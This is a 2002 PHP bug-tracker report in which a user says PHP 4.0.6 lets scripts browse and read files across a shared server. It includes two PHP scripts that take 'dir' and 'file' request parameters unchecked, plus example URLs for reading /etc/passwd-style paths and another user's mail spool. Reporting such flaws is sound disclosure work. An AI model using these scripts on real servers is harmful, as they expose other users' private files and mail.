|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2002-01-23 14:54 UTC] hholzgra@php.net
[2002-01-23 16:52 UTC] daniel@php.net
[2002-01-23 17:13 UTC] rasmus@php.net
[2002-04-02 13:49 UTC] sander@php.net
[2002-05-03 00:00 UTC] php-bugs at lists dot php dot net
|
|||||||||||||||||||||||||||
Copyright © 2001-2025 The PHP GroupAll rights reserved. |
Last updated: Sun Oct 26 12:00:01 2025 UTC |
I've found a possible bug in php 4.06. using simple function readdir(); I coul explore about 90 % of server including /var/spool/mail /ect/passwd e.t.c. I've wrote simple script that let me to move through all directories: <? if ($dir=="") { $dir="."; } function getDirList ($dirName) { print("<h1>Index of: $dirName</h1><hr>"); $dirs=array(); $files=array(); $dirfiles=array(); $dirn=0; $filen=0; $d = dir($dirName); while($entry = $d->read()) { if ($entry != "." && $entry != "..") { if (is_dir($dirName."/".$entry)) { array_push($dirs, "$dirName/$entry"); $dirn++; } else { array_push($files, "$entry"); array_push($dirfiles, "$dirName"); $filen++; } } } $d->close(); $tmp=0; while ($tmp<$dirn) { print("<a href='?dir=$dirs[$tmp]'>$dirs[$tmp]</a><br>"); $tmp++; } $tmp=0; while ($tmp<$filen) { print("<a href='?dir=$dirfiles[$tmp]'>$dirfiles[$tmp]</a>/<a href='$dirfiles[$tmp]/$files[$tmp]'>$files[$tmp]</a><br>"); $tmp++; } if ($dirName!=".") { print("<hr><button OnClick='javascript:history.back();'>Back"); } } getDirList("$dir"); ?> Default directory is '.' (Your home directory), but if you load this page with parameter dir=/ ( ex. http://your.host/dir.php?dir=/ ) You will probably access main folder on your unix server. I wrote second script that let me read the files not in my home directory: <? function readtxt ($path) { $Plik=fopen($path, "r"); flock($Plik, 1); $rozm=filesize("$path"); $flaga=0; while($flaga<$rozm) { $Linia = fgets($Plik, 2); print("$Linia"); if ($Linia=="\n") { print("<br>"); } $flaga++; } flock($Plik, 3); fclose($Plik); } readtxt ($file); ?> By typing, for example http://your.host/readtxt.php?file=/var/spool/mail/disco_dzik i could read disco_dzik's mail. Simple, but serious... Both of scripts wold not move You outside your home directory if the server would be two machines (first one for system, and the second one just fore home directories) - it's obvious, but I've checked it ;) P.S. Scripts were wroten for my use only, so some of the variables are named in polish - sorry for that ;) This is a serious bug that needs to be fixed !